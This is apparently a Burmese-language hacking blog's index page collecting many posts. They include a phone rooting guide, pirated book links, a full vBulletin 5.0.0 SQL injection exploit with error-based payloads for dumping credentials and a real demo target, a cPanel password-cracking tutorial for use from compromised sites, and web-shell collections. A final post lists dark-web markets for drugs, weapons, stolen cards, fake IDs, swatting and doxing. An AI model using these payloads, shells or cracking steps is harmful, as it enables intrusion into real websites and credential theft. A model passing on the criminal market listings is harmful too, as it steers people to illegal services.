[ Top Attacks ] Website Hacking

0x:1) – Injection
0x:2) – Broken Authentication and Session Management
0x:3) – Cross-Site Scripting (XSS)
0x:4) – Insecure Direct Object References
0x:5) – Security Misconfiguration
0x:6) – Security Misconfiguration
0x:7) – Insecure Cryptographic Storage – Merged with 0x13
0x:8) – Sensitive Data Exposure
0x:9) – Failure to Restrict URL Access – Broadened into
0x:10) – Missing Function Level Access Control
0x:11) – Cross-Site Request Forgery (CSRF)
0x:12) - Security Misconfiguration
0x:13) – Using Known Vulnerable Components
0x:14) – Unvalidated Redirects and Forwards
0x:15) – Insufficient Transport Layer Protection

Thanks To #India Forum @ Edward Maya

Continue Reading

Samsung Galaxy Grand (Install CWM Recovery & Root Samsung Galaxy Grand )

ဟိုေန ့က က်ြန္ေတာ့္အကို Samsung Grand ၀ယ္လာတယ္ .. စကၤာပူ $ 390 ေပးရတယ္ .. Android Version 4.1 , ျမန္မာေဖာင့္ include ပါလာေတာ့ Bagan ေလးထည့္ျပီး အဆင္ကိုေျပလို ့ :D ဒါမဲ့ ၀ယ္ျပီး ၂ရက္မျကာဘူး ပ်က္ေရာ :omg: :bp: ဘယ္လိုျဖစ္လဲဆိုေတာ့ App ေတြအကုန္ဟမ္းျပီး Touch Screen ကိုထိလို ့မရေတာ့ဘူး .. .. အထဲမွာေတာ့ အားလံုးက အလုပ္လုပ္တယ္(ect:ဖုန္းေခၚရင္ Misscall ၀င္လာတယ္ ..)  Screen ဖြင့္ဖို ့အတြက္ Switch ေတာင္လုပ္လို ့မရေတာ့ဘူး .. ဘထရီ ျဖဳတ္ျပီး Power ျပန္ဖြင့္ေတာ့ Boot ေတာင္မတက္ေတာ့ဘူး .. ဆိုင္သြားေမးေတာ့ Android System ေတြ Crash ျဖစ္ကုန္တာတဲ့  .. သူ ့ဆိုင္အတြင္းခန္းထဲယူျပီး (5မိနစ္ေတာင္မျကာဘူး) ျပန္ထြက္လာတယ္ .. ရသြားျပီတဲ့ ... စမ္းျကည့္ေတာ့ ဟုတ္တယ္ .. ရသြားတယ္ .. ဒါမဲ့ Screen က ပိတ္ျပီးျပန္ဖြင့္ေတာ့ မရေတာ့ဘူး .. :blink: ဆိုင္ေနာက္တေခါက္ထပ္သြားတယ္ .. အဲ့လိုဘဲ ဆိုင္အတြင္းခန္းထဲယူျပီး ျပန္ထြက္လာတယ္ .. .. ထပ္စမ္းေတာ့ရသြားျပန္တယ္ .. :blink: .. ဆိုင္မွာဘဲ ထိုင္စမ္းေတာ့ အဆင္ကိုေျပလို ့ ... ... ဒါနဲ ့အိမ္ျပန္လမ္းမွာ ထပ္စမ္းေတာ့မရေတာ့ဘူး . :ohmy: :bitch: . နဲနဲေတာ့ ေပါက္လာတယ္ .. .. :huh: ဆိုင္ကဘယ္လိုလုပ္လို ့ ခဏဘဲရတာလဲေပါ့ :blink: ဒါနဲ ့အိမ္ျပန္ေရာက္ေတာ့ က်ြန္ေတာ္ လက္ထဲ စေရာက္တာဘဲ :hehe: :devlish: ဟီးဟီး ..  Phone ကို ပိတ္ျပီး ျပန္ဖြင့္ေတာ့  Boot မတက္ဘူး .. အဲ့ဒါနဲ ့ Googling စလုပ္ေတာ့ CWM Recovery အေျကာင္းဖတ္မိတယ္ .. .. CWM Recovery လုပ္ရင္း တခါထဲ Root မယ္ေပါ့ .. ပထမ ဦးဆံုး ကိုယ့္ ဖုန္း battery ကို 60 % ရွိပါေစ .. .. ဒါဆိုရင္ စလို ့ရပါျပီ .. .. လိုအပ္တဲ့ File ေတြ ေအာက္မွာေဒါင္းပါ ။
Download :.:
Download Odin PC and install it 
Download and install Samsung Kies 
Download the Philz Advanced Touch Recovery.tar.md5 file
Download the SuperSu.zip file (for root)

1) အားလံုးျပီးျပီဆိုရင္ စလို ့ရပါျပီ .. .. ဖုန္းကို ပိတ္ျပီး ျပန္ဖြင့္ပါ . အဲ့မွာ Volume Down + Home Button + Power Key ဒီ ခလုတ္ ၃ခုကို ဖိထားလိုက္ပါ .. Warning ဆိုျပီး တက္လာပါလိမ့္မယ္ ... ဒါဆို Volume Up ကိုႏိုပ္ျပီး Continue လုပ္လိုက္ပါ ..

ဒါဆို Phone က Downlad mode ျဖစ္ေနပါျပီ . . ဒါဆိုရင္ Computer နဲ ့ Phone ကို cable နဲ ့ Join ျပီးရင္ ခုနက Install လုပ္ထားတဲ့ ODIN ကိုဖြင့္လိုက္ပါ

2) အကယ္၍ ဖုန္း Join ျပီးသြားရင္ ID:COM box ဟာ ေဘးနားမွာ အျပာေရာင္ သို ့မဟုတ္ အ၀ါေရာင္ ျပပါလိမ့္မယ္ .. အဲ့ဒါကေတာ့ ကိုယ့္ရဲ ့ODIN version ေပၚမူတည္ပါတယ္

ဒါဆိုရင္ PDA tab ကို အမွန္ေလးျခစ္ျပီး ခုနက Download လုပ္ထားတဲ့ Philz Advanced Touch Recovery.tar.md5 ကိုထည့္လိုက္ပါ ။

3) Ok . ဒါဆိုရင္ Start ကို ႏိုပ္လိုက္ပါ ။ ID:COM ေပၚမွာ "PASS" ေပၚလာတဲ့အထိ ေစာင့္ပါ . . အားလံုးျပီးသြားရင္ Phone Restarts ခ်သြားပါလိမ့္မယ္ . . အဲ့မွာ က်ြန္ေတာ့္အကိုဖုန္းက ျပန္ေကာင္းသြားပါျပီ. . သို ့ေပမဲ့ Screen Off ျပီး ျပန္ဖြင့္ရင္ မရေတာ့ျပန္ဘူး .. အဲ့ဒါနဲ ့ လုပ္မဲ့လုပ္ တခါထဲ Root ပါ ခ်လိုက္ပါတယ္ ... ဒါဆိုရင္  ကိုယ့္ဖုန္းထဲကို SuperSu.zip ကို SD card ထဲထည့္လိုက္ပါဦး .. .. ထည့္ျပီးသြားရင္ ဖုန္းကို Restarts ခ်ျပီး logo တက္မလာခင္မွာ Volume Up + Home Button + Power Key ကိုႏိုပ္လိုက္ပါ ။  ဒါဆိုရင္ ဖုန္းဟာ recovery mode ထဲေရာက္သြားပါျပီ ။

4) ဒါဆိုရင္ Install Zip>Install Zip from Sdcard ကိုႏိုပ္ျပီး ခုနက ကိုယ္ထည့္ထားတဲ့ SuperSu.zip ကိုရွာလိုက္ပါ .. .. ေတြ ့ျပီဆိုရင္ Supersu.zip ကိုႏိုပ္ျပီး yes ကိုသာ ဆက္ေရြးလိုက္ပါ .. ..

5) အားလံုးျပီးသြားရင္ Reboot ကိုႏိုပ္ျပီး ျကည့္လိုက္ပါ .. ဖုန္း Auto တက္လာျပီး Version ကိုသြားစစ္ေတာ့ 4.2 ျဖစ္သြားပါျပီ ။ ေနာက္ျပီး ကိုယ့္ဖုန္းမွာ superuser ဆိုတာေလးေပၚလာပါလိမ့္မယ္ .. ROOT ~! အဲ့မွာ က်ြန္ေတာ့္အကိုဖုန္း ျပႆနာ ေျဖရွင္းလို ့ျပီးသြားပါျပီ . .  Thz for Reading !~

Ref : usama (techbeasts.com)

Continue Reading

Professional Penetration Testing (EBook)

Professional Penetration Testing: Creating and Operating a Formal Hacking Lab

English | Flash Video | SWF, ~718 kb/s | 800x600 | Duration: N/A | PCM, 44 KHz (1 ch) | + PDF Guide | 3.64 GB

Genre: Video Training

ဟီး အားေတာ့နာသား  3.64 GB ေတာ့ရွိတယ္ .. .. ဒါမဲ့ တင္ေပးတဲ့ သူက ခြဲတင္ေပးထားပါတယ္ ။ 

Download :.:

• http://extabit.com/file/2a0px9jwy9zj2/Professional_Penetration_Testing.part01.rar

• http://extabit.com/file/2a0px9jwy9zji/Professional_Penetration_Testing.part02.rar

• http://extabit.com/file/2a0px9jwy9zjy/Professional_Penetration_Testing.part04.rar

• http://extabit.com/file/2a0px9jwya2qm/Professional_Penetration_Testing.part05.rar

• http://extabit.com/file/2a0px9jwy9zou/Professional_Penetration_Testing.part03.rar

• http://extabit.com/file/2a0px9jwya2q6/Professional_Penetration_Testing.part06.rar

• http://extabit.com/file/2a0px9jwy9zni/Professional_Penetration_Testing.part08.rar

• http://extabit.com/file/2a0px9jwya2ou/Professional_Penetration_Testing.part07.rar

• http://extabit.com/file/2a0px9jwy9mzy/Professional_Penetration_Testing.part09.rar

• http://extabit.com/file/2a0px9jwy9wj2/Professional_Penetration_Testing.part10.rar

• http://extabit.com/file/2a0px9jwy9n1a/Professional_Penetration_Testing.part11.rar

• http://extabit.com/file/2a0px9jwy9n0e/Professional_Penetration_Testing.part13.rar

• http://extabit.com/file/2a0px9jwy9q7i/Professional_Penetration_Testing.part14.rar

• http://extabit.com/file/2a0px9jwy9mz2/Professional_Penetration_Testing.part12.rar

• http://extabit.com/file/2a0px9jwy9glq/Professional_Penetration_Testing.part15.rar

• http://extabit.com/file/2a0px9jwy9gn2/Professional_Penetration_Testing.part16.rar

• http://extabit.com/file/2a0px9jwyaoz2/Professional_Penetration_Testing.part17.rar

• http://extabit.com/file/2a0px9jwyaou6/Professional_Penetration_Testing.part18.rar

• http://extabit.com/file/2a0px9jwyaovy/Professional_Penetration_Testing.part19.rar

• http://extabit.com/file/2a0px9jwyarzy/Professional_Penetration_Testing.part20.rar

• http://extabit.com/file/2a0px9jwyas5a/Professional_Penetration_Testing.part21.rar

• http://extabit.com/file/2a0px9jwyaoxa/Professional_Penetration_Testing.part22.rar

• http://extabit.com/file/2a0px9jwyas32/Professional_Penetration_Testing.part23.rar

• http://extabit.com/file/2a0px9jwyaiha/Professional_Penetration_Testing.part24.rar

• http://extabit.com/file/2a0px9jwyafbi/Professional_Penetration_Testing.part25.rar

• http://extabit.com/file/2a0px9jwyafe6/Professional_Penetration_Testing.part26.rar

• http://extabit.com/file/2a0px9jwyaffy/Professional_Penetration_Testing.part27.rar

• http://extabit.com/file/2a0px9jwya5vy/Professional_Penetration_Testing.part28.rar

• http://extabit.com/file/2a0px9jwya5xa/Professional_Penetration_Testing.part29.rar

• http://extabit.com/file/2a0px9jwya92m/Professional_Penetration_Testing.part31.rar

• http://extabit.com/file/2a0px9jwya5xq/Professional_Penetration_Testing.part30.rar

• http://extabit.com/file/2a0px9jwya90e/Professional_Penetration_Testing.part32.rar

• http://extabit.com/file/2a0px9jwxnln2/Professional_Penetration_Testing.part33.rar

• http://extabit.com/file/2a0px9jwxnllq/Professional_Penetration_Testing.part34.rar

• http://extabit.com/file/2a0px9jwxnlpq/Professional_Penetration_Testing.part35.rar

• http://extabit.com/file/2a0px9jwxnloe/Professional_Penetration_Testing.part37.rar

• http://extabit.com/file/2a0px9jwxnc7i/Professional_Penetration_Testing.part36.rar

 Link ေသသြားရင္ ....

• http://rapidgator.net/file/12215347/Professional_Penetration_Testing.part01.rar.html

• http://rapidgator.net/file/12215410/Professional_Penetration_Testing.part02.rar.html

• http://rapidgator.net/file/12215367/Professional_Penetration_Testing.part03.rar.html

• http://rapidgator.net/file/12215395/Professional_Penetration_Testing.part04.rar.html

• http://rapidgator.net/file/12215420/Professional_Penetration_Testing.part05.rar.html

• http://rapidgator.net/file/12215432/Professional_Penetration_Testing.part06.rar.html

• http://rapidgator.net/file/12215495/Professional_Penetration_Testing.part07.rar.html

• http://rapidgator.net/file/12215460/Professional_Penetration_Testing.part08.rar.html

• http://rapidgator.net/file/12215473/Professional_Penetration_Testing.part09.rar.html

• http://rapidgator.net/file/12215532/Professional_Penetration_Testing.part10.rar.html

• http://rapidgator.net/file/12215519/Professional_Penetration_Testing.part11.rar.html

• http://rapidgator.net/file/12215533/Professional_Penetration_Testing.part12.rar.html

• http://rapidgator.net/file/12216225/Professional_Penetration_Testing.part13.rar.html

• http://rapidgator.net/file/12216132/Professional_Penetration_Testing.part14.rar.html

• http://rapidgator.net/file/12216223/Professional_Penetration_Testing.part15.rar.html

• http://rapidgator.net/file/12216131/Professional_Penetration_Testing.part16.rar.html

• http://rapidgator.net/file/12216267/Professional_Penetration_Testing.part17.rar.html

• http://rapidgator.net/file/12217075/Professional_Penetration_Testing.part18.rar.html

• http://rapidgator.net/file/12216224/Professional_Penetration_Testing.part19.rar.html

• http://rapidgator.net/file/12216226/Professional_Penetration_Testing.part20.rar.html

• http://rapidgator.net/file/12217074/Professional_Penetration_Testing.part21.rar.html

• http://rapidgator.net/file/12217070/Professional_Penetration_Testing.part22.rar.html

• http://rapidgator.net/file/12217071/Professional_Penetration_Testing.part23.rar.html

• http://rapidgator.net/file/12217076/Professional_Penetration_Testing.part24.rar.html

• http://rapidgator.net/file/12217200/Professional_Penetration_Testing.part25.rar.html

• http://rapidgator.net/file/12217108/Professional_Penetration_Testing.part26.rar.html

• http://rapidgator.net/file/12217191/Professional_Penetration_Testing.part27.rar.html

• http://rapidgator.net/file/12217190/Professional_Penetration_Testing.part28.rar.html

• http://rapidgator.net/file/12214493/Professional_Penetration_Testing.part29.rar.html

• http://rapidgator.net/file/12214491/Professional_Penetration_Testing.part30.rar.html

• http://rapidgator.net/file/12214490/Professional_Penetration_Testing.part31.rar.html

• http://rapidgator.net/file/12214492/Professional_Penetration_Testing.part32.rar.html

• http://rapidgator.net/file/12214587/Professional_Penetration_Testing.part33.rar.html

• http://rapidgator.net/file/12214589/Professional_Penetration_Testing.part34.rar.html

• http://rapidgator.net/file/12214607/Professional_Penetration_Testing.part35.rar.html

• http://rapidgator.net/file/12214611/Professional_Penetration_Testing.part36.rar.html

• http://rapidgator.net/file/12214629/Professional_Penetration_Testing.part37.rar.html

Credit : I Don't Know Who's Upload !


Copy From : P3NT3ST3R

Continue Reading

Professional JavaScript for Web Developers, 3rd Edition

Book Description :.:

If you want to achieve JavaScript's 
full potential, it is critical to understand its nature, history, and 
limitations. To that end, this updated version of the bestseller by 
veteran author and JavaScript
guru Nicholas C. Zakas covers JavaScript from its very beginning to the
present-day incarnations including the DOM, Ajax, and HTML5. Zakas 
shows you how to extend this powerful language to meet specific needs 
and create dynamic user interfaces
for the web that blur the line between desktop and internet. By the end
of the book, you'll have a strong understanding of the significant 
advances in web development as they relate to JavaScript so that you can
apply them to your next website. . . 

Download :.: http://it-ebooks.info/book/483/

Credit : cLeVeR fOx

Continue Reading

LFI-Via-phpinput Tutorial By H1N1

က်ြန္ေတာ္တို ့ MHU က အကိုျကီး ကို H1N1 ရဲ ့ LFI-Via-phpinput Tutorial စာအုပ္ပါ ။ LFI ကို Php://input နဲ ့ Attacking လုပ္သြားပံုေလးကို ပံုနဲ ့တကြ ေသခ်ာရွင္းျပထားပါတယ္ ။ :D ဖတ္ျကည့္လိုက္ရင္ ပိုနားလည္သြားမွာပါ :D 

Download : http://www.mediafire.com/download/md2w1k21pi1ssih/LFI-Via-phpinput_Tutorial_by_H1N1.pdf

Continue Reading

WSO Shell In Python & Perl

  PHP နဲ ့ေရးထားတာ မဟုတ္ဘဲနဲ ့ Python နဲ ့ Perl programming နဲ ့ေရးထားတဲ့ Python Shell နဲ ့ Perl Shell ပါ . 

ဒါကေတာ့ Perl Shell : 

ဒါကေတာ့ Python Shell : 

Download : 

http://www.mediafire.com/download/oebvbpsgfnrruq6/wso.rar

Shell Password : root 

Continue Reading

Ruby Tutorials Series By NewBoston (Video Tutorials Series)

1 - Installing Ruby
2 - Writing a Simple Program
3 - Math and Variables
4 - Classes
5 - Creating Objects
6 - Inheritance
7 - Adding More Attributes
8 - Methods
9 - Everything is an Object!
10 - Arguements
11 - String Functions
12 - More About Variables & Methods!
13 - Expressions and Shortcuts
14 - Decision Making
15 - Comparison Operators
16 - unless
17 - Loops
18 - Extracting the Value From Loops
19 - Changing Data Types
20 - Constants
21 - Multiple Line String Variables
22 - Interpolation
23 - Beginning Regular Expressions
24 - Regular Expressions in Loops
25 - Extracting Numbers and Character
26 - Decision Making with Regular Expressions
27 - Beginning Arrays
28 - push and pop
29 - each and length
30 - Cool Array Tricks
31 - Hashes
32 - Methods for Hashes

Here the Link :

http://thenewboston.org/list.php?cat=50

Enjoy and They are Really Easy to UnderStand! :) 

Credit : NewBoston

Continue Reading

UNION BASE INJECTION (Ebook)

ဒါက်ြန္ေတာ့္ရဲ ့ပထမဦးဆံုး SQL Injection စာအုပ္ပါ။ Chapter 1 မွာေတာ့ Union Select နဲ ့Inject လုပ္ပံုလုပ္နည္းေလးဘဲေရးထား ပါတယ္ .. .. :D

Download
https://www.dropbox.com/s/ljv6qykcyi8ij94/Union%20Base%20SQL%20Injection%20By%20little.pdf
(or)
: http://www.mediafire.com/download/amdhfvutdec1sb4/Union_Base_SQL_Injection_By_little.pdf

လင့္ ေသသြားရင္ Comment ေပးခဲ့ပါ . တျခား ဆိုက္ေနတင္ ထပ္တင္ေပးေပါ့မယ္ :D

Continue Reading

vBulletin 5.0.0 all Beta releases SQL Injection Exploit 0day (Priv8)

1337 မွာ $ 300 နဲ ့ေရာင္းထားတာေလးပါ  :)

http://www.priv8.1337day.com/exploit/description/20002

vBulletin 5.0.0 all Beta releases SQL Injection Exploit 0day
#Category: web application
#Type: SQL Injection
#Requirements: Firefox/Live HTTP Headers/
#Dork: Powered by vBulletin™ Version 5.0.0 Beta (or) Use ur Brain you'll get more o_O

Step 1
Create an Account on vBulletin forum Verify the account and Activate it
For Demo we will use this Forum
Link = http://www.prospectrush.com/new_forum/
I have alredy made an account so i wil direct login

Step 2
go to/Open any topic and open Live HTTP Headers (https://addons.mozilla.org/en/firefox/addon/live-http-headers/) << download from here
and then on the Topic page search for "Like" button and Clik on it ....
then the Http responce would be caught on HTTP HEaders addon
Step 3
Go to the first POST in HTTP Headers ,it will look like this
POST *Something /ajax/api/reputation/vote HTTP/1.1
select it and click on Replay button
Step 4
Then go on Send POST Content and use below Query ,
just add the Below Query after "noteid=somenumber"
=======================
SQL Query
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x27,0x7e,password,0x27, 0x7e) FROM user LIMIT 1,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
=======================
The Above SQLi command will fetch out the first record from user table(username/password)
see the username and pass in encrypted get the salt to and decrypt it i wont show decrypting use your brain :)

=============
Greets to Real Author , All Indian & Pakistani Brothers , 1337day , ashiyane forums & All Indian Hacking Groups
//Note : Those Brothers who have my mail id can Contact me for other Deals
Offer Valid till 29th March 2013
Regards
./NoTty_rAJ
Thanks

[#Other SQLi Syntaxes]
*********************************************************************************************************************
|Version():
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************

*********************************************************************************************************************
|User():
*********************************************************************************************************************
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************

*********************************************************************************************************************
|Database():
*********************************************************************************************************************
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************

*********************************************************************************************************************
|Database Print:
*********************************************************************************************************************
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************
*********************************************************************************************************************
|Table Count:
*********************************************************************************************************************
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xHEXCODEOFDATABASE)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************
*********************************************************************************************************************
|Print Tables:
*********************************************************************************************************************
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xHEXCODEOFDATABASE LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************
*********************************************************************************************************************
|Columns of selected table:
*********************************************************************************************************************
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************
*********************************************************************************************************************
|Fetch Out Data:
*********************************************************************************************************************
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,column1,0x27,0x7e,column2,0x27,0x 7e) FROM ANY_TABLE LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************

Greetz to HeXagone  & Raw-X

Continue Reading

Cpanel Cracker (Php Script)

CPanel Cracking Script ပါ ။ Shell ေပၚက တဆင့္ Crack ရတာပါ ။ Tutorial ဖတ္ခ်င္ရင္ http://lit2le.blogspot.com/2013/07/tut-cpanel-cracking.html မွာသြားဖတ္ပါ ။ 

Download :.: > http://pastebin.com/CTYx2hUt

Continue Reading

[TUT] Cpanel Cracking

FOR EDUCATIONAL PURPOSE ONLY

လိုအပ္တာက  :-

• Shelled site
• Cpanel Password Cracker (shell) (http://lit2le.blogspot.com/2013/07/cpanel-cracker-php-script.html)

Step By Step Tutorial :-

• First open you shell & upload the cpanel password cracker shell . Download the Cpanel password cracker shell from Here . 
• Then go down & click on User .

• Now after you have clicked on User, below you will get all the usernames of the Cpanel . So now move to next step, your next step will be to get a good Password list for a Dictionary attack . After getting it you have to copy the username & paste it in the username block (above) & paste the password list in the password block .Then finally click on start .

Tip: Password list should be short & effective . 

• When the cracking is finished, you will see the result . 

• password ရျပီ ဆိုရင္ -> www.site.com:2082 (ဒါမွမဟုတ္) www.site.com/cpanel ကေန၀င္ပါ ။ (www.site.com:2082 ကအဆင္ေျပ ပိုအဆင္ေျပပါတယ္) :D 

Have Fun lady :)

Credit : h@ck2PlAy

Continue Reading

PHP & ASP Shells [Collection]

က်ြန္ေတာ္ သိထားတဲ့ Php Shell နဲ ့ Asp Shell . Web hack ေနတဲ့ ညီကိုေတြအဆင္ေျပတာေအာင္လို ့ပါ ။ 

(Link ေသသြား Comment ထဲမွာေရးေပးခဲ့ပါ) :D Enjoy :D 

PHP Shells 

• b374k.txt 
• C100.txt 
• C99.txt 
• R00t.txt 
• R57.txt 
• R57shell1.40.txt 
• R57shell1.50.txt 
• R57shell2.0.txt.zip 
• Mulci V2.0.txt 
• Sniper-Sa Shell.txt 
• Egy-Spider Shell 
• Uploader.txt 

ASP Shells 

• Aspx Shell.txt 
• Pouya Asp Shell.txt 
• Kacak ASP shell.txt 
• Zehir ASP shell.txt 
• Zehir4 ASP shell.txt 

Continue Reading

What is the deep web?

ပံုေလးျကည့္ရင္ ရွင္းေလာက္တယ္ ။ ေထြေထြထူးထူးမေျပာေတာ့ပါဘူး ။  သူနဲ ့တိုက္ဆိုင္တဲ့ link ေလးေတြေအာက္မွာတခ်က္ျကည့္ပါ ။
The deep web can only be reached with TOR. 

What is "marians Web"? 

Marianas Web is the deepest deepest deepest part of the Internet/deep web. I never reached it, but i read it many about it and the only thing what i can say is: u dont want to go there! Marianas Web is a Mystery, a few people say it exists and a few say it doesnt exist. I Think it exists, because the "deep web" cant be the deepest part of the Internet. there must be more!! 

What can i find on the "deep web"? 

Well, almost everything. Sad is that many sites have child porn. When u buy something, u MUST pay with Bitcoin (if they want a CC, dont buy it!). Be carefull! The Police is waiting For u.. 

How do i get in the "deep web"? 

Its very simple. U need 1 Software: TOR Install it and go to the websites with the TOR firefox. The websites r very slowly, so dont give up when it is loading it may take up to 2 min. 

Deep Web sites:- 

Directories and Link Lists: 

• *. TORDir – dppmfxaacucguzpc.onion 
• *. TorLinks – torlinkbgs6aabns.onion 
• *. OnionBookmark – x7yxqg5v4j6yzhti.onion 
• *. The Hidden Wiki – kpvz7ki2v5agwt35.onion/ wiki/index.php/Main_Page 
• *. TorMarks – 4jbxjjrbakmdcmvb.onion 
• *. Core.Onion – eqt5g4fuenphqinx.onion 
• *. Sites Deep Web – ekwreugkil5ncyyh.onion 
• *. Hidden Wiki PasteBin – pastebin.com/ek0cAbxi 
• *. Hidden Wiki Mirrors – fkyvwpu7ccsorke2.onion 
• *. Tor Onion Link List – f3ew3p7s6lbftqm5.onion/ text/TOR.ONION.LINKLIST.txt 

Search Engines: 

• *. TORCH - xmh57jrzrnw6insl.onion 
• *. Deep Search - xycpusearchon2mc.onion 

Mail and Hosting 

• *. Tor Mail – jhiwjjlqpyawmpjx.onion 
• *. TorPM - 4eiruntyxxbgfv7o.onion/ pm/ 

Commerce:

*. Black Market Reloaded – 5onwnspjvuk7cwvk.onion/ index.php 
*. Silk Road – silkroadvb5piz3r.onion/ index.php 
*. High Supplies – phyofa4vi3y4i5iq.onion 
*. C’thulhu – iacgq6y2j2nfudy7.onion 
*. EU Weapons & Ammunition – 4eiruntyxxbgfv7o.onion/ snapbbs/2e76676/ 
*. HackBB – clsvtzwzdgzkjda7.onion 
Fixed Match Buy-in :
*. Service – j3vsnvvcfvoduip6.onion 
*. CC4ALL – qhkt6cqo2dfs2llt.onion 
*. Downloaditforyou - 3srxdnetmhbfyisw.onion 
*. Swatting Service - jd2iqa4yt7vqvu5o.onion 
*. PayPal Store - 5xhp3ntcxfpfd5ig.onion 

Forums and Post Boards :

*. HackBB – clsvtzwzdgzkjda7.onion 
*. Silk Road Forums – dkn255hz262ypmii.onion/ index.php 
*. RedditTor - k6gsb4ibatcico35.onion 
*. qPastebin – 4eiruntyxxbgfv7o.onion/ paste/ 
*. DoxBin - npieqpvpjhrmdchg.onion 
*. Bittit - ejz7kqoryhqwosbk.onion/ 

Identification: 

*. Onion ID – g6lfrbqd3krju3ek.onion 
*. All Purpose Identities – cf6qjzygqbu2c4z5.onion 
*. Terminal Velocity ID Store - 4eiruntyxxbgfv7o.onion/ snapbbs/22ad3c25/ threadlist.php 

Education and Research :

*. The TOR Library – am4wuhz3zifexz5u.onion 
*. TOR University – ccbn6mrdudb5fbxd.onion/ TorUniversity.html 
*. The Human Experiment - xqz3u5drneuzhaeo.onion 
*. Tard’s Library - xsin4xbme24aatvk.onion 

Security and Society :

*. AntiSec Embassy - ibhg35kgdvnb7jvw.onion 
*. Parazite - qx7j2selmom4ioxf.onion Blogs 
*. LookingGlass - tns7i5gucaaussz4.onion/ blog/ 
*. Hidden Blog - utup22qsb6ebeejs.onion/ 

Tor infrastructure :

http://hbpvnydyyjbmhx6b.onion/ help run the enter - exit servers and set them up or augment the bandwith for certain countries 
http://a5ec6f6zcxtudtch.onion/ tor-i2p-proxy2-en.htm to iepsites 
http://losacd3c5pt25ymv.onion/ not free fast good bridges 
Directory http://zw3crggtadila2sg.onion/ downornot/ down or not test it first 
http://kpvz7ki2v5agwt35.onion/ wiki/index.php/ List_of_Anonymous_Networks 
private services http://ahmia.fi/ just a list of 200 links to sites of which many don't work anymore 
http://32rfckwuorlf4dlv.onion/ some links 
http://torlinkbgs6aabns.onion/ 
http://4jbxjjrbakmdcmvb.onion/ complete.html some links 
http://xqz3u5drneuzhaeo.onion/ users/noel/forum.php?id=1 active forum about links on deepweb 
http://3suaolltfj2xjksb.onion/ hiddenwiki/index.php/Main_Page directory of links 
http://torlinkbgs6aabns.onion/ tor links search 
http://xmh57jrzrnw6insl.onion/ search 1 million onion pages 
http://nstmo7lvh4l32epo.onion/ search.php? query=belgium&search=1 search 
http://sc3njt2i2j4fvqa3.onion/ newzbin search of Usenet interesting onions 
http://kpvz7ki2v5agwt35.onion/ wiki/index.php/Email test security emailservice blog 
http://fkyvwpu7ccsorke2.onion/ mirro...0aj.sn.sourcedns.com/ _gbpprorg/mil/index.html 
http://fkyvwpu7ccsorke2.onion/ mirro...2wcy6jnn4r.onion/ opensource/II/Anonymity.html 
http://fkyvwpu7ccsorke2.onion/ mirrors/-Poly Front/ g7pz322wcy6jnn4r.onion/ opensource/II/Payment.html and anonymity 
http://fkyvwpu7ccsorke2.onion/ mirro... Bureau/ cryptoanarchy.org/wiki/ Main_Page.html wiki about anonimity on the web and services 
http://4eiruntyxxbgfv7o.onion/ anonymous services photo sharing etc bookmarks 
http://x7yxqg5v4j6yzhti.onion/ public and private bookmarks onion 
http:// ay5kwknh6znfmcbb.onion/ torbook/ social network for tor Chat and forums and contactforms to make 
http://4eiruntyxxbgfv7o.onion/ snapbbs/736364f4/index.php anonymous irc chat 
http://4eiruntyxxbgfv7o.onion/ snapbbs/ 
http://ci3hn2uzjw2wby3z.onion/ public chatboard 
http://jhiwjjlqpyawmpjx.onion/ TorMail 
http://a5ec6f6zcxtudtch.onion/ anon-email.htm mixmaster anonymous email 
http://a5ec6f6zcxtudtch.onion/ anon-news.htm anonymous forums mixmaster 
http://c4wcxidkfhvmzhw6.onion/ index.en.html anonymous privacybox as contact for bloggers and journalists 
http://qtt2yl5jocgrk7nu.onion/ encrypted secret keys for people working for or with Indymedia, an alternative worldwide mediaplatform 
http://ueoluw7ltbo6sdx2.onion/ anonymous escrow service paying for payments between seller and buyers hosting 
http:// www.xqz3u5drneuzhaeo.onion/ hidden hosting not free anymore php mysql 
http:// www.ms4kc75hlvnfcxgz.onion/ hidden blogging books 
http://p2uekn2yfvlvpzbu.onion/ books about 
http://c3jemx2ube5v5zpg.onion/ english a lot SF 
http://xsin4xbme24aatvk.onion/ a lot of military and resistance documents 
